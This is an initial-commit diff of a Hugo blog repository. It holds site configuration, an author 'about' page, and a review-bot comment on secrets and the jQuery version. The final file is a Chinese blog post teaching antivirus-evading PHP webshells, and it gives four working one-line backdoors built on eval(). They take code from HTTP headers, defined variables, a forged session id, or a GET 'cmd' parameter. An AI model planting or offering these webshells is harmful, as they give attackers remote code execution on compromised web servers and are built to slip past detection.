
rname repo name

Y4er committed Jul 11, 2019
0 parents commit aa125d7b9ecede3aa6e4ad0a324540126c0d6668
Showing 352 changed files with 20,858 additions and 0 deletions.
@@ -0,0 +1,2 @@
public/
hugo.exe
@@ -0,0 +1,3 @@
[submodule "themes/even"]
path = themes/even
url = https://github.com/olOwOlo/hugo-theme-even.git
@@ -0,0 +1,5 @@
hugo+even+netlify构建的个人博客

http://Y4er.com

记录生活和笔记。
@@ -0,0 +1,11 @@
---
title: "{{ replace .TranslationBaseName "-" " " | title }}"
date: {{ .Date }}
lastmod: {{ .Date }}
draft: false
tags: []
categories: []
comment: true
---

<!--more-->
@@ -0,0 +1,209 @@
baseURL = "https://y4er.com/"
languageCode = "zh-cn"
defaultContentLanguage = "zh-cn" # en / zh-cn / ... (This field determines which i18n file to use)
title = "Y4er的博客 | 伪程序员,信安爱好者,专注于网络攻防和信息安全"
preserveTaxonomyNames = true
enableRobotsTXT = true
enableEmoji = true
theme = "even"
enableGitInfo = true # use git commit log to generate lastmod record # 可根据 Git 中的提交生成最近更新记录。

# Syntax highlighting by Chroma. NOTE: Don't enable `highlightInClient` and `chroma` at the same time!
pygmentsOptions = "linenos=table"
pygmentsCodefences = true
pygmentsUseClasses = true
pygmentsCodefencesGuessSyntax = true

hasCJKLanguage = true # has chinese/japanese/korean ? # 自动检测是否包含 中文\日文\韩文
paginate = 8 # 首页每页显示的文章数
disqusShortname = "" # disqus_shortname
googleAnalytics = "UA-131218098-1" # UA-XXXXXXXX-X
copyright = "" # default: author.name ↓ # 默认为下面配置的author.name ↓

[author] # essential # 必需
name = "Y4er"

[sitemap] # essential # 必需
changefreq = "weekly"
priority = 0.5
filename = "sitemap.xml"

[[menu.main]] # config your menu # 配置目录
name = "主页"
weight = 10
identifier = "home"
url = "/"
[[menu.main]]
name = "归档"
weight = 20
identifier = "archives"
url = "/post/"
[[menu.main]]
name = "关于"
weight = 30
identifier = "about"
url = "/about/"
[[menu.main]]
name = "碎碎念"
weight = 40
identifier = "words"
url = "/words/"

[params]
version = "4.x" # Used to give a friendly message when you have an incompatible update
debug = false # If true, load `eruda.min.js`. See https://github.com/liriliri/eruda

since = "2018" # Site creation time # 站点建立时间
# use public git repo url to link lastmod git commit, enableGitInfo should be true.
# 指定 git 仓库地址,可以生成指向最近更新的 git commit 的链接,需要将 enableGitInfo 设置成 true.
gitRepo = "https://github.com/Y4er/Y4er.github.io"

# site info (optional) # 站点信息(可选,不需要的可以直接注释掉)
logoTitle = "Y4er" # default: the title value # 默认值: 上面设置的title值
keywords = ["Y4er","信息安全","网络安全","红蓝攻防","渗透测试","bypass","waf","注入","黑客","chabug"]
description = "伪程序员,信安爱好者,专注于网络攻防和信息安全."

# paginate of archives, tags and categories # 归档、标签、分类每页显示的文章数目,建议修改为一个较大的值
archivePaginate = 20

# show 'xx Posts In Total' in archive page ? # 是否在归档页显示文章的总数
showArchiveCount = true

# The date format to use; for a list of valid formats, see https://gohugo.io/functions/format/
dateFormatToUse = "2006-01-02"

# show word count and read time ? # 是否显示字数统计与阅读时间
moreMeta = true

# Syntax highlighting by highlight.js
highlightInClient = false

# 一些全局开关,你也可以在每一篇内容的 front matter 中针对单篇内容关闭或开启某些功能,在 archetypes/default.md 查看更多信息。
# Some global options, you can also close or open something in front matter for a single post, see more information from `archetypes/default.md`.
toc = true # 是否开启目录
autoCollapseToc = true # Auto expand and collapse toc # 目录自动展开/折叠
fancybox = true # see https://github.com/fancyapps/fancybox # 是否启用fancybox(图片可点击)

# mathjax
mathjax = false # see https://www.mathjax.org/ # 是否使用mathjax(数学公式)
mathjaxEnableSingleDollar = false # 是否使用 $...$ 即可進行inline latex渲染
mathjaxEnableAutoNumber = false # 是否使用公式自动编号
mathjaxUseLocalFiles = false # You should install mathjax in `yout-site/static/lib/mathjax`

postMetaInFooter = true # contain author, lastMod, markdown link, license # 包含作者,上次修改时间,markdown链接,许可信息
linkToMarkDown = false # Only effective when hugo will output .md files. # 链接到markdown原始文件(仅当允许hugo生成markdown文件时有效)
contentCopyright = '<a rel="license noopener" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank">CC BY-NC-ND 4.0</a>' # e.g. '<a rel="license noopener" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank">CC BY-NC-ND 4.0</a>'

changyanAppid = "" # Changyan app id # 畅言
changyanAppkey = "" # Changyan app key

livereUID = "" # LiveRe UID # 来必力

baiduPush = true # baidu push # 百度
baiduAnalytics = "150ef5faf0461b9f83612d60d72b86b1" # Baidu Analytics
baiduVerification = "PsCl6huhUk" # Baidu Verification
googleVerification = "gPHyyln9EbiXF7wv-nBpX50vJcwJbi1KKbUyFOxuVkA" # Google Verification # 谷歌

# Link custom CSS and JS assets
# (relative to /static/css and /static/js respectively)
customCSS = []
customJS = []

uglyURLs = false # please keep same with uglyurls setting

[params.publicCDN] # load these files from public cdn # 启用公共CDN,需自行定义
enable = true
jquery = '<script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>'
slideout = '<script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>'
fancyboxJS = '<script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>'
fancyboxCSS = '<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">'
timeagoJS = '<script src="https://cdn.jsdelivr.net/npm/timeago.js@3.0.2/dist/timeago.min.js" integrity="sha256-jwCP0NAdCBloaIWTWHmW4i3snUNMHUNO+jr9rYd2iOI=" crossorigin="anonymous"></script>'
timeagoLocalesJS = '<script src="https://cdn.jsdelivr.net/npm/timeago.js@3.0.2/dist/timeago.locales.min.js" integrity="sha256-ZwofwC1Lf/faQCzN7nZtfijVV6hSwxjQMwXL4gn9qU8=" crossorigin="anonymous"></script>'
flowchartDiagramsJS = '<script src="https://cdn.jsdelivr.net/npm/raphael@2.2.7/raphael.min.js" integrity="sha256-67By+NpOtm9ka1R6xpUefeGOY8kWWHHRAKlvaTJ7ONI=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/flowchart.js@1.8.0/release/flowchart.min.js" integrity="sha256-zNGWjubXoY6rb5MnmpBNefO0RgoVYfle9p0tvOQM+6k=" crossorigin="anonymous"></script>'
sequenceDiagramsCSS = '<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/bramp/js-sequence-diagrams@2.0.1/dist/sequence-diagram-min.css" integrity="sha384-6QbLKJMz5dS3adWSeINZe74uSydBGFbnzaAYmp+tKyq60S7H2p6V7g1TysM5lAaF" crossorigin="anonymous">'
sequenceDiagramsJS = '<script src="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.js" integrity="sha256-4O4pS1SH31ZqrSO2A/2QJTVjTPqVe+jnYgOWUVr7EEc=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/snapsvg@0.5.1/dist/snap.svg-min.js" integrity="sha256-oI+elz+sIm+jpn8F/qEspKoKveTc5uKeFHNNVexe6d8=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/underscore@1.8.3/underscore-min.js" integrity="sha256-obZACiHd7gkOk9iIL/pimWMTJ4W/pBsKu+oZnSeBIek=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/gh/bramp/js-sequence-diagrams@2.0.1/dist/sequence-diagram-min.js" integrity="sha384-8748Vn52gHJYJI0XEuPB2QlPVNUkJlJn9tHqKec6J3q2r9l8fvRxrgn/E5ZHV0sP" crossorigin="anonymous"></script>'

# Display a message at the beginning of an article to warn the readers that it's content may be outdated.
# 在文章开头显示提示信息,提醒读者文章内容可能过时。
[params.outdatedInfoWarning]
enable = false
hint = 30 # Display hint if the last modified time is more than these days ago. # 如果文章最后更新于这天数之前,显示提醒
warn = 180 # Display warning if the last modified time is more than these days ago. # 如果文章最后更新于这天数之前,显示警告

[params.gitment] # Gitment is a comment system based on GitHub issues. see https://github.com/imsun/gitment
owner = "" # Your GitHub ID
repo = "" # The repo to store comments
clientId = "" # Your client ID
clientSecret = "" # Your client secret

[params.utterances] # https://utteranc.es/
owner = "Y4er" # Your GitHub ID
repo = "Y4er.github.io" # The repo to store comments

[params.gitalk] # Gitalk is a comment system based on GitHub issues. see https://github.com/gitalk/gitalk
owner = "" # Your GitHub ID
repo = "" # The repo to store comments
clientId = "" # Your client ID
clientSecret = "" # Your client secret

# Valine.
# You can get your appid and appkey from https://leancloud.cn
# more info please open https://valine.js.org
[params.valine]
enable = false
appId = '你的appId'
appKey = '你的appKey'
notify = false # mail notifier , https://github.com/xCss/Valine/wiki
verify = false # Verification code
avatar = 'mm'
placeholder = '说点什么吧...'
visitor = false

[params.flowchartDiagrams]# see https://blog.olowolo.com/example-site/post/js-flowchart-diagrams/
enable = false
options = ""

[params.sequenceDiagrams] # see https://blog.olowolo.com/example-site/post/js-sequence-diagrams/
enable = false
options = "" # default: "{theme: 'simple'}"

[params.busuanzi] # count web traffic by busuanzi # 是否使用不蒜子统计站点访问量
enable = false
siteUV = true
sitePV = true
pagePV = true

[params.reward] # 文章打赏
enable = true
wechat = "/img/reward/wechat.png" # 微信二维码
alipay = "/img/reward/alipay.png" # 支付宝二维码

[params.social] # 社交链接
a-email = "mailto:admin@chabug.org"
g-github = "https://github.com/Y4er"
o-bilibili = "https://space.bilibili.com/131568325"

# See https://gohugo.io/about/hugo-and-gdpr/
[privacy]
[privacy.googleAnalytics]
anonymizeIP = true # 12.214.31.144 -> 12.214.31.0
[privacy.youtube]
privacyEnhanced = true

# 将下面这段配置取消注释可以使 hugo 生成 .md 文件
# Uncomment these options to make hugo output .md files.
#[mediaTypes]
# [mediaTypes."text/plain"]
# suffixes = ["md"]
#
#[outputFormats.MarkDown]
# mediaType = "text/plain"
# isPlainText = true
# isHTML = false
#
#[outputs]
# home = ["HTML", "RSS"]
# page = ["HTML", "MarkDown"]
# section = ["HTML", "RSS"]
# taxonomy = ["HTML", "RSS"]
# taxonomyTerm = ["HTML"]
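Review bot: The `clientSecret` keys under `[params.gitment]` and `[params.gitalk]` are empty now, but nothing in the file says they must stay that way. `gitRepo` points at a public GitHub repository, and both comment widgets run in the browser, so a real OAuth secret set here would be published in the repo history and presumably rendered into every page. I would put a comment above each table such as `# Leave clientSecret empty: this file is public and the value would be shipped to every visitor; utterances needs no secret.` The same caution applies to `appKey` under `[params.valine]` if that section is ever enabled. Separately, the `jquery@3.2.1` pin in `[params.publicCDN]` predates later jQuery security releases; bumping it means regenerating the matching `integrity` value, since a stale hash makes the browser refuse the script.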
@@ -0,0 +1,69 @@
---
title: "一个菜鸡的简介"
date: 2018-12-16T12:11:25+08:00
---
<center>

![](https://y4er.com/img/uploads/20190430191344.png)

ID:`Y4er`

团 队:[`ChaBug`](http://www.chabug.org/)

Email:`admin[@]chabug.org`

Github: [Y4er](http://github.com/Y4er)

学历:专科 (计应 · 在读)

</center>

## 爱好

对网络安全领域有强烈兴趣,喜欢钻研最新安全技术。

喜欢复现各种漏洞,偶尔打打CTF,平常没事写写代码,看看电影,~~有钱的话~~会时不时出来旅游。

---

## 技能

1. 熟悉web常见漏洞及原理
2. 熟练使用metasploit、burp、sqlmap等常见辅助工具
3. 能够独立完成中小型网站的渗透测试
4. 可以使用python、php编写脚本辅助渗透测试
5. 具有最基本的php代码审计能力[还在学]
6. ~~内网 域渗透方向[还在学]~~

目前专注于php代码审计及实战。

**特别特别想在毕业之后从事安全行业!**

---

## 项目

[Django-Blog](https://github.com/Y4er/Django-blog):我的第二个使用Django开发的Blog

[webscan](https://github.com/Y4er/webscan):使用python3+django2开发的web扫描项目

[secwiki](https://github.com/Y4er/secwiki):一个文章聚合知识本地化的项目

都拿不出手,先放这吧。

## 原创文章
[记一次由百度云会员引起的渗透](https://y4er.com/post/faka-hack/)

[记一次渗透之从后台到提权](https://y4er.com/post/pentest-03-12/)

[Python模块学习之Logging日志模块](https://www.chabug.org/code/640.html)

## 证书

2018、2019年VR虚拟现实设计制作高职组省赛二等奖 (无关安全方向)

2019年第四届河南省高校信息安全大赛ISCC线下赛一等奖

---

博客部署状态[![Netlify Status](https://api.netlify.com/api/v1/badges/ef493264-2fef-4671-958f-fba416b2dd12/deploy-status)](https://app.netlify.com/sites/y4er/deploys)
@@ -0,0 +1,57 @@
---

title: "PHP利用Apache、Nginx的特性实现免杀Webshell"
date: 2019-01-25T21:20:47+08:00
lastmod: 2019-01-25T21:20:47+08:00
draft: false
tags: ['apache','nginx','shell','bypass']
categories: ['code']
comment: true
---

`get_defined_vars()``getallheaders()`是两个特性函数,我们可以通过这两个函数来构造我们的webshell。
前几天看到的,一直忘记写,填坑。
<!--more-->

| 环境 | 函数 | 用法 |
| :----: | :------------------: | :------------------------------: |
| nginx | `get_defined_vars()` | 返回由所有已定义变量所组成的数组 |
| apache | `getallheaders()` | 获取全部 HTTP 请求头信息 |

## apache环境

```php
<?php
eval(next(getallheaders()));
?>
```

![](https://y4er.com/img/uploads/20190509161475.jpg)

## apache和nginx环境通用

```php
<?php
eval(implode(reset(get_defined_vars())));
?>
```

![](https://y4er.com/img/uploads/20190509164784.jpg)
另外一种通过执行伪造的sessionid值,进行任意代码执行。

```php
<?php
eval(hex2bin(session_id(session_start())));
?>
```

![](https://y4er.com/img/uploads/20190509166713.jpg)

`706870696e666f28293b`这个是`phpinfo();`的hex编码。

## 给shell加密码

```php
<?php eval(get_defined_vars()['_GET']['cmd']);?>
```
